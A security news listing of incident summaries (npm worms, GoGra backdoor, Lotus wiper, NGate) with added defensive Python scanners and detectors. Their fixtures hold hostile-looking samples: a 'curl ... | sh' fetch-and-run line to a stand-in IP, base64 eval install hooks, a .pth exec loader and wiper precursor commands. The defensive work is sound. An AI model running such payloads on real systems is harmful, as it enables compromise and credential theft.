< ciso brief />

All news in category “Incidents and Data Breaches”

2740 articles · page 16 of 137

Malicious KICS Docker Images and VS Code Extensions

⚠️ Cybersecurity researchers warn that unknown actors pushed malicious images to the official checkmarx/kics Docker Hub repository, overwriting existing tags and adding a non-official release. Socket's analysis shows the bundled KICS binary was modified to collect, encrypt and exfiltrate unredacted scan reports to an external endpoint, a high risk because IaC scans frequently include credentials. Checkmarx's Visual Studio Code extensions (versions 1.17.0 and 1.19.0) were also found to download and run a remote addon through the Bun runtime from a hardcoded GitHub URL with no integrity check. Organizations that pulled the affected images or installed the extensions should assume any secrets exposed to them are compromised and treat the event as a broader supply-chain compromise.
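A minimal illustration of the missing check, added here as an example and not code from Checkmarx or the KICS project: the extension behaviour described above pulls an addon from a fixed URL and executes whatever comes back, so whoever controls that location (or the account behind it) controls the IDE. The hardened variant pins a SHA-256 computed at release time and refuses to run anything that differs. The fetchers, the "addon" bytes and the 203.0.113.5 address are constructed stand-ins so the block runs offline.

```python
"""Fetch-then-execute with and without a pinned digest (added example, not vendor code)."""
import hashlib
import hmac
from typing import Callable

# Constructed sample artefacts: what the publisher shipped, and a tampered copy served later.
GOOD_ADDON = b"console.log('addon v1');\n"
TAMPERED_ADDON = (b"console.log('addon v1');\n"
                  b"require('child_process').exec('curl http://203.0.113.5/x | sh');\n")

# Digest pinned inside the extension at release time (here computed from GOOD_ADDON).
PINNED_SHA256 = hashlib.sha256(GOOD_ADDON).hexdigest()


def unsafe_fetch_and_run(fetch: Callable[[], bytes], run: Callable[[bytes], None]) -> None:
    """Weak pattern: whatever the URL serves today is executed."""
    run(fetch())


def safe_fetch_and_run(fetch: Callable[[], bytes], run: Callable[[bytes], None],
                       expected_sha256: str) -> bool:
    """Hardened pattern: verify the digest before handing bytes to the runtime.

    Returns True if the addon was executed, False if it was rejected.
    """
    data = fetch()
    actual = hashlib.sha256(data).hexdigest()
    # compare_digest is not strictly required for a public digest, but costs nothing.
    if not hmac.compare_digest(actual, expected_sha256):
        return False
    run(data)
    return True


def simulate(served: bytes) -> dict:
    """Serve one payload to both patterns and record what each actually executed."""
    executed = {"unsafe": None, "safe": None}

    def runner(slot: str) -> Callable[[bytes], None]:
        def run(data: bytes) -> None:
            executed[slot] = data          # stand-in for passing the bytes to Bun
        return run

    unsafe_fetch_and_run(lambda: served, runner("unsafe"))
    safe_fetch_and_run(lambda: served, runner("safe"), PINNED_SHA256)
    return executed


if __name__ == "__main__":
    print("genuine addon:", simulate(GOOD_ADDON))
    print("tampered addon:", simulate(TAMPERED_ADDON))
```

The pin only helps if it ships inside the signed extension package rather than next to the addon on the same mutable URL. The same principle applies to the image half of this incident: pull by immutable digest (`image@sha256:<digest>`) rather than by a tag that the registry owner can repoint.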

Supply-Chain Worm Hijacks npm Packages to Steal Tokens

🔐 Researchers warn of a self-propagating supply-chain worm that infected multiple npm packages to harvest developer credentials and reuse stolen npm tokens to publish poisoned releases. Tracked as CanisterSprawl by Socket and StepSecurity, the campaign uses malicious postinstall hooks and exfiltrates data to both an HTTPS webhook and an ICP canister. The malware also includes PyPI propagation via a .pth payload that runs on interpreter start; JFrog reported compromised xinference Python packages with a Base64 second-stage collector. Recommended mitigations include restricting token scope, rotating and revoking exposed tokens, avoiding unsafe CI triggers like pull_request_target, and monitoring package publishes and postinstall behavior.

Harvester Deploys Linux GoGra Backdoor Against South Asia

🔒 Symantec and Carbon Black attribute a new Linux build of the GoGra backdoor to the threat actor known as Harvester, with deployments likely targeting entities in South Asia. The implant abuses Microsoft Graph and Outlook mailboxes as a covert C2 channel and is delivered via ELF binaries disguised as PDF lures. Incoming tasking emails (subject prefix "Input") carry Base64-encoded, encrypted shell commands that the backdoor decodes, decrypts and runs via /bin/bash; results are sent back as emails labeled "Output" and the original tasking messages are deleted.

Spain Dismantles $4.7M Spanish-Language Manga Piracy Site

🚨 Spanish police dismantled what they describe as the largest Spanish-language manga piracy platform, active since 2014 and drawing millions of monthly users worldwide. Authorities allege the site offered free, unauthorized access to copyrighted manga and earned more than $4,700,000 in advertising revenue through aggressive pop-up ads. Many of those ads were pornographic and appeared on nearly every user action, raising child-safety and reputational concerns. Four people were arrested; investigators seized more than $470,000 held in cold cryptocurrency wallets and disrupted a second site that was under development.

Silent Subject Phishing Targets VIPs and Evades Filters

📧 Cybersecurity firm Cyberproof has identified a surge of “silent subject” phishing attacks in Q1 2026 that deliberately omit email subjects to evade filters and trigger recipient curiosity. These campaigns target executives and high-value accounts, delivering links, QR codes and attachments that often redirect to spoofed sites or mobile interactions. Attackers rotate domains, use shortened URLs and deploy legitimate tools like Datto RMM to persist. Organizations are advised to enforce MFA, inspect full sender addresses and deploy advanced content-aware email defenses.

New npm supply-chain worm steals auth tokens, spreads

🚨 Researchers have uncovered a self-propagating npm supply-chain attack that steals developer credentials and attempts to republish infected packages from compromised accounts. Socket and StepSecurity observed malicious versions in at least 16 Namastex Labs packages, including AI tooling and database modules. The payload harvests tokens, API keys, SSH keys, cloud and CI/CD credentials, browser-stored wallets, and attempts to use npm and PyPI publish tokens to inject itself into packages and spread.
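Two things in this entry and the CanisterSprawl item above are directly auditable on a developer machine: npm lifecycle scripts that run during `npm install`, and `.pth` files in site-packages, whose `import` lines the Python interpreter executes at every startup. The scanner below is an added example, not Socket's, StepSecurity's or JFrog's tooling. The regex of suspicious tokens and the package tree it writes into a temporary directory are constructed for illustration; the distutils-precedence.pth entry is included because setuptools legitimately ships an import-line .pth, so hits need an allowlist rather than automatic quarantine.

```python
"""Find install-time code execution hooks in node_modules and site-packages (added example)."""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle scripts npm runs on install; any of them is arbitrary code execution on the dev box.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Constructed heuristic: a hook that fetches, decodes, evals or pipes into a shell deserves a look.
SUSPICIOUS = re.compile(
    r"\bcurl\b|\bwget\b|base64|\beval\(|child_process|\|\s*(sh|bash)\b|\bnode\s+-e\b|\bbun\s", re.I)


def scan_npm_hooks(node_modules: Path) -> list:
    """Report every installed package that declares an install-time script."""
    findings = []
    for pkg_json in node_modules.rglob("package.json"):
        try:
            meta = json.loads(pkg_json.read_text())
        except (OSError, ValueError):
            continue
        scripts = meta.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append({"package": meta.get("name", pkg_json.parent.name), "hook": hook,
                                 "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def scan_pth_files(site_packages: Path) -> list:
    """A .pth file normally lists paths; lines starting with 'import' are executed by site.py."""
    findings = []
    for pth in site_packages.glob("*.pth"):
        for lineno, line in enumerate(pth.read_text().splitlines(), 1):
            if line.startswith(("import ", "import\t")):
                findings.append({"file": pth.name, "line": lineno, "code": line})
    return findings


def build_sample_tree(root: Path):
    """Constructed fixture: benign package, native build hook, fetch-and-eval hook, two .pth loaders."""
    nm = root / "node_modules"
    for name, meta in {
        "left-pad": {"name": "left-pad", "version": "1.3.0"},
        "native-thing": {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}},
        "evil-helper": {"name": "evil-helper", "version": "2.0.1", "scripts": {
            # constructed: decodes and evals an embedded blob at install time
            "postinstall": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coJ2hpJyk=','base64').toString())\""}},
    }.items():
        (nm / name).mkdir(parents=True)
        (nm / name / "package.json").write_text(json.dumps(meta))
    sp = root / "site-packages"
    sp.mkdir(parents=True)
    (sp / "easy-install.pth").write_text("./some_pkg-1.0-py3.egg\n")
    # legitimate: setuptools ships this import-line .pth, so expect it on every hit list
    (sp / "distutils-precedence.pth").write_text("import _distutils_hack; _distutils_hack.add_shim()\n")
    # constructed: the pattern the worm uses, code that runs on interpreter start
    (sp / "zzz_loader.pth").write_text("import base64, os; exec(base64.b64decode('cHJpbnQoJ2hpJyk='))\n")
    return nm, sp


def run_scan():
    """Build the fixture in a temp dir, scan it, and return (npm_findings, pth_findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        nm, sp = build_sample_tree(Path(tmp))
        return scan_npm_hooks(nm), scan_pth_files(sp)


if __name__ == "__main__":
    npm_hits, pth_hits = run_scan()
    for hit in npm_hits + pth_hits:
        print(hit)
```

On a real machine point the two functions at `./node_modules` and the output of `python -c "import site; print(site.getsitepackages())"`. For CI runners, `npm config set ignore-scripts true` stops lifecycle scripts from executing at all, at the cost of breaking packages that genuinely need a native build step.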

Trojanized NFC Relay App Used to Steal Card Data in Brazil

💳 Cybercriminals have trojanized an Android NFC-relay application to capture contactless payment data and PINs, enabling cloning of cards and remote ATM cash-outs. ESET researchers report a new NGate malware variant was injected into the HandyPay app and distributed via a fake lottery site and a spoofed Google Play page targeting Android users in Brazil since November 2025. Traces in the injected code, including emoji markers in debug logs, led researchers to suspect use of generative AI, and ESET has published indicators and a MITRE ATT&CK mapping to aid detection.

ICE Confirms Use of Israeli Graphite Spyware Domestically

🕵️‍♂️ ICE has publicly acknowledged using Graphite, the spyware sold by the Israeli firm Paragon, confirming prior reporting and prompting renewed scrutiny of government surveillance practices. The agency says the tool is used in immigration and criminal investigations but gave few details about scope, oversight or legal basis. Privacy advocates and technologists warn that deploying such remote-access spyware on personal devices can expose large amounts of personal data and bypass standard protections.

Former Ransomware Negotiator Pleads Guilty Over Collusion

🔒 Angelo Martino, a 41-year-old former ransomware negotiator, has pleaded guilty to conspiring with the BlackCat (ALPHV) ransomware group after secretly passing clients' negotiation and insurance details to the gang. While working for incident response firm DigitalMint, he disclosed policy limits and internal bargaining positions so the gang could maximize extortion payouts, and was paid for the information. He also admitted working with associates to deploy ransomware between April and November 2023; authorities have seized about $10 million in assets. He faces up to 20 years and will be sentenced on July 9.

Lotus Wiper Targets Venezuelan Energy Sector, Destroying Data

⚠️ Kaspersky has identified a previously undocumented file wiper named Lotus Wiper that was used in destructive attacks against Venezuela's energy and utilities sector in late 2025 and early 2026. The campaign relies on two coordinated batch scripts that weaken defenses, probe NETLOGON shares and legacy services, and prepare the environment to deploy a wiper that erases recovery mechanisms, overwrites drives and deletes files. The artifact contains no extortion demands, indicating a targeted, non-financially motivated destructive operation likely planned well in advance.

New Linux GoGra Backdoor Uses Microsoft Graph API for Comms

🔐 Symantec researchers describe a new Linux variant of the GoGra backdoor that abuses Microsoft Graph API and Outlook mailboxes for stealthy command-and-control. The malware uses hardcoded Azure AD credentials to obtain OAuth2 tokens and polls a mailbox folder named "Zomato Pizza" for base64-encoded, AES-CBC-encrypted commands. A Go-based dropper hides an i386 ELF payload as a PDF and establishes persistence via systemd and an XDG autostart entry mimicking the Conky monitor. Processed commands are encrypted and returned by reply email with the subject "Output," and the original command email is removed to limit forensic visibility.
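The persistence described in this entry and the Harvester item above (a systemd unit plus an XDG autostart entry posing as the Conky monitor) is cheap to triage on a Linux host. The script below is an added example, not Symantec's detection logic: it parses `~/.config/autostart/*.desktop` and `~/.config/systemd/user/*.service` and flags executables living outside package-managed directories, under hidden directories or in world-writable paths, plus autostart entries whose Name does not match the binary they launch. The directory layout and the five sample entries are constructed in a temporary directory so the block runs offline; the path lists are assumptions to tune per distribution.

```python
"""Triage XDG autostart entries and systemd user units for masquerading persistence (added example)."""
import configparser
import os
import shlex
import tempfile
from pathlib import Path

# Assumed "normally package-managed" and "anyone can write here" prefixes; adjust per distro.
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/usr/local/bin/",
               "/bin/", "/sbin/", "/opt/", "/snap/")
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def triage_command(display_name: str, command: str) -> list:
    """Return the reasons an Exec/ExecStart line deserves a closer look (empty list = nothing odd)."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return ["unparseable command line"]
    if not argv:
        return ["empty command line"]
    exe = argv[0].lstrip("-@:+!")            # strip systemd ExecStart prefix characters
    base = os.path.basename(exe)
    reasons = []
    if exe.startswith("/"):
        if exe.startswith(WORLD_WRITABLE):
            reasons.append("executable in a world-writable directory")
        elif not exe.startswith(SYSTEM_DIRS):
            reasons.append("executable outside package-managed paths")
        if any(part.startswith(".") for part in Path(exe).parts[1:-1]):
            reasons.append("executable under a hidden directory")
    words = display_name.split()
    if words and words[0].lower() not in base.lower():
        reasons.append(f"display name {display_name!r} does not match executable {base!r}")
    return reasons


def _read_ini(path: Path) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                     # keep key case (Exec, ExecStart)
    cp.read(path)
    return cp


def scan_autostart(autostart_dir) -> list:
    findings = []
    for entry in sorted(Path(autostart_dir).glob("*.desktop")):
        cp = _read_ini(entry)
        if not cp.has_section("Desktop Entry"):
            continue
        sec = cp["Desktop Entry"]
        if sec.get("Hidden", "false").lower() == "true":
            continue                         # Hidden=true disables the entry
        reasons = triage_command(sec.get("Name", ""), sec.get("Exec", ""))
        if reasons:
            findings.append({"file": entry.name, "exec": sec.get("Exec", ""), "reasons": reasons})
    return findings


def scan_user_units(units_dir) -> list:
    findings = []
    for unit in sorted(Path(units_dir).glob("*.service")):
        cp = _read_ini(unit)
        if not cp.has_section("Service"):
            continue
        cmd = cp["Service"].get("ExecStart", "")
        reasons = triage_command("", cmd)    # Description is free text, so skip the name check
        if reasons:
            findings.append({"file": unit.name, "exec": cmd, "reasons": reasons})
    return findings


def build_fixture(root: Path):
    """Constructed fixture: a genuine Conky entry, two masquerades, one clean and one odd unit."""
    auto = root / ".config" / "autostart"
    units = root / ".config" / "systemd" / "user"
    auto.mkdir(parents=True)
    units.mkdir(parents=True)
    (auto / "conky.desktop").write_text("[Desktop Entry]\nType=Application\nName=Conky\nExec=conky -d\n")
    (auto / "conky-monitor.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Conky\nExec=/home/u/.cache/.dbus/conky -d\n")
    (auto / "sysmon.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=System Monitor\nExec=/home/u/.local/share/.x/monitor -q %u\n")
    (units / "pulseaudio.service").write_text(
        "[Unit]\nDescription=Sound Service\n[Service]\nExecStart=/usr/bin/pulseaudio --daemonize=no\n")
    (units / "conky.service").write_text(
        "[Unit]\nDescription=Conky system monitor\n[Service]\nExecStart=/home/u/.local/share/.conky/conky -c %h/.conkyrc\n")
    return auto, units


def run_triage():
    """Build the fixture, scan it, and return (autostart_findings, unit_findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        auto, units = build_fixture(Path(tmp))
        return scan_autostart(auto), scan_user_units(units)


if __name__ == "__main__":
    for hit in run_triage()[0] + run_triage()[1]:
        print(hit)
```

Flagged paths are worth confirming with `dpkg -S <path>` or `rpm -qf <path>`; a binary no package owns, sitting under a dotted directory and launched as "Conky", is the shape of the persistence described above.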

Mustang Panda Deploys New LOTUSLITE Variant Targeting India

🛡️ Acronis researchers have identified a new variant of LOTUSLITE, attributed with medium confidence to the Chinese-linked Mustang Panda, being distributed via a banking-themed lure focused on India. The backdoor uses a dynamic DNS HTTPS C2 and supports remote shell access, file operations, and session management, indicating espionage-focused intent rather than financial theft. The campaign begins with a Compiled HTML (CHM) file that embeds a legitimate executable with a rogue DLL and triggers JavaScript fetched from cosmosmusic[.]com to perform DLL side-loading. The implanted DLL, dnx.onecore.dll, communicates with editor.gleeze[.]com, and similar artifacts were found targeting South Korean and U.S. policy and diplomatic communities.

French ANTS Confirms Data Breach; Hacker Claims Sale

🛡️ France's government agency ANTS confirmed a data breach after a threat actor claimed to have stolen citizen records in an intrusion last week. The agency says exposed fields may include login IDs, full names, email addresses, dates of birth, unique account identifiers and, for some individuals, postal addresses, places of birth and phone numbers. ANTS has notified CNIL, the Paris prosecutor and involved ANSSI, is informing affected users and warns the data could be used for phishing and social engineering.

New Lotus wiper targets Venezuelan energy and utilities

🔴 Kaspersky researchers analyzed a previously undocumented data-wiping malware, dubbed Lotus, uploaded from a Venezuelan host in mid-December and used in targeted attacks against energy and utility organizations in Venezuela. Before detonation the attacker runs two batch scripts that weaken defenses, change account passwords, log off users, disable network interfaces and run destructive tools like diskpart, robocopy and fsutil to overwrite and fill drives. The Lotus binary then performs low-level IOCTL operations, clears USN journals, deletes restore points and overwrites physical sectors to render systems unrecoverable. Administrators are advised to monitor these precursor activities and maintain offline, validated backups.
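The advice in this entry and the Lotus Wiper item above is to catch the precursor scripts rather than the wiper itself: password changes, forced logoffs, interface shutdowns, NETLOGON probes and diskpart/fsutil/robocopy invocations are individually common, but several of them on one host inside a short window are not. The detection below is an added example, not Kaspersky's rule set: it classifies process command lines with constructed regexes and raises one alert per host when at least three distinct precursor categories occur within 30 minutes. The telemetry is constructed EDR/Sysmon-style sample data, not incident data.

```python
"""Precursor-chain detection for wiper-style intrusions over process-creation telemetry (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed rule set keyed on the precursor behaviour described in the write-up; regexes are illustrative.
RULES = {
    "account_password_change": re.compile(r"\bnet1?\s+user\s+\S+\s+\S+", re.I),
    "forced_logoff": re.compile(r"\blogoff(\.exe)?\b|\bshutdown(\.exe)?\s+/l\b", re.I),
    "network_interface_disable": re.compile(r"\bnetsh\s+interface\s+set\s+interface\b.*\bdisable\b", re.I),
    "netlogon_share_probe": re.compile(r"\\\\[^\s\\]+\\netlogon\b", re.I),
    "disk_fill_or_wipe_tooling": re.compile(
        r"\bdiskpart\b|\bfsutil\s+file\s+(createnew|setzerodata)\b|\brobocopy\b.*\s/(mir|purge)\b", re.I),
}


def classify(cmdline: str) -> set:
    """Every precursor category a single command line matches (usually zero or one)."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}


def detect_precursor_chains(events, window=timedelta(minutes=30), threshold=3) -> list:
    """One alert per host whose matched commands span >= threshold categories inside `window`."""
    by_host = defaultdict(list)
    for ev in events:
        cats = classify(ev["cmdline"])
        if cats:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), cats, ev["cmdline"]))
    alerts = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        best = None
        for i, (start, _, _) in enumerate(hits):          # slide the window over each hit as a start point
            seen, cmds = set(), []
            for ts, cats, cmd in hits[i:]:
                if ts - start > window:
                    break
                seen |= cats
                cmds.append(cmd)
            if len(seen) >= threshold and (best is None or len(seen) > len(best["categories"])):
                best = {"host": host, "first_seen": start.isoformat(),
                        "categories": sorted(seen), "commands": cmds}
        if best:
            alerts.append(best)
    return alerts


# Constructed process-creation telemetry: WS01 shows the chain, WS02 only a routine backup job.
SAMPLE_EVENTS = [
    {"ts": "2025-12-15T02:01:00", "host": "WS01", "cmdline": "net user Administrator Xk9!pQ2#"},
    {"ts": "2025-12-15T02:01:05", "host": "WS01", "cmdline": "net user svc_backup /active:no"},
    {"ts": "2025-12-15T02:02:00", "host": "WS01", "cmdline": r"dir \\DC01\NETLOGON"},
    {"ts": "2025-12-15T02:03:00", "host": "WS01", "cmdline": 'netsh interface set interface "Ethernet" admin=disable'},
    {"ts": "2025-12-15T02:05:00", "host": "WS01", "cmdline": r"diskpart /s C:\Windows\Temp\d.txt"},
    {"ts": "2025-12-15T02:06:00", "host": "WS01", "cmdline": "logoff"},
    {"ts": "2025-12-14T22:00:00", "host": "WS02", "cmdline": "net user alice"},
    {"ts": "2025-12-15T03:00:00", "host": "WS02", "cmdline": r"robocopy D:\data \\NAS01\backup /MIR /R:1"},
]


if __name__ == "__main__":
    for alert in detect_precursor_chains(SAMPLE_EVENTS):
        print(alert["host"], alert["first_seen"], alert["categories"])
```

The threshold is the tuning knob: a single robocopy mirror or a lone password reset is noise, while three categories on one workstation in half an hour is the point at which isolating the host is cheaper than being wrong. Feed it Sysmon Event ID 1 or the equivalent EDR process-start stream, keyed on the host field.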

SystemBC C2 Server Reveals Over 1,570 Compromised Hosts

🔍 Check Point researchers found a SystemBC C2 server linked to an affiliate of The Gentlemen RaaS operation, controlling a botnet of more than 1,570 compromised corporate hosts worldwide. SystemBC establishes SOCKS5 tunnels and talks to its C2 over a custom RC4-encrypted protocol, enabling payload download or in-memory execution. The activity aligns with The Gentlemen's multi-platform double-extortion campaigns, which abuse GPOs, exposed services and compromised credentials to escalate access and deploy ransomware.

Trojanized Android App Enables New NFC Payment Fraud

📱 ESET has identified a new NGate variant that uses a trojanized version of the legitimate HandyPay NFC relay app to harvest payment card data and PINs. Distributed since November 2025 and focused on Brazil, the malicious app relays tapped NFC data to attacker-controlled devices to facilitate contactless fraud and ATM withdrawals. It requires minimal permissions by leveraging its role as the default payment application, helping it evade detection.

Scattered Spider Member 'Tylerb' Pleads Guilty in US

🔒 Tyler Robert Buchanan, a 24-year-old British national and senior member of the cybercrime group Scattered Spider, has pleaded guilty to wire fraud conspiracy and aggravated identity theft for his role in 2022 SMS-phishing attacks. He admitted launching tens of thousands of phishing texts that enabled intrusions at companies including Twilio, LastPass, DoorDash and Mailchimp. Prosecutors say the campaign fueled SIM-swap thefts that siphoned at least $8 million in cryptocurrency from U.S. investors. Buchanan faces a statutory maximum of 22 years; sentencing is set for August 21, 2026.

Ransomware Negotiator Pleads Guilty After Betrayal

🔒 Angelo Martino, a former ransomware negotiator, pleaded guilty to conspiring with the BlackCat ransomware group to extort U.S. companies in 2023. From April through November 2023, he provided confidential negotiation details — including victims' insurance limits and internal bargaining positions — to maximize ransom demands in exchange for payment. Martino admitted collaborating with incident responders Ryan Goldberg and Kevin Martin while working at DigitalMint and Sygnia, and authorities say the defendants extorted at least $1.2 million in a single case. Investigators seized roughly $10 million in assets; Martino faces up to 20 years and is scheduled for sentencing on July 9, 2026.

The Gentlemen RaaS Expands, Targeting Enterprise Systems

🔐 Check Point researchers report that The Gentlemen, a ransomware-as-a-service operation first identified in mid-2025, has claimed over 320 victims with the majority of attacks occurring in early 2026. Affiliates are supplied with cross-platform ransomware written in Go for Windows, Linux, NAS and BSD, plus a C-based ESXi encryptor. The toolkit enables automated lateral movement, Group Policy deployment and credential reuse to achieve rapid, domain-wide encryption, and incidents frequently show defense evasion and post-exploitation tools such as SystemBC and Cobalt Strike.

NGate Android Campaign Trojans HandyPay to Steal NFC

🔒 ESET researchers uncovered a NGate Android campaign that trojanized the HandyPay NFC relay app to steal contactless card data and capture PINs for fraudulent ATM withdrawals. The poisoned app, spread via fake Rio de Prêmios sites and a deceptive Play Store listing, asks to be set as the default payment app and prompts users to enter their card PIN before tapping their card. Artifacts including emoji-laden debug messages suggest parts of the injected code may have been generated or modified with a large language model.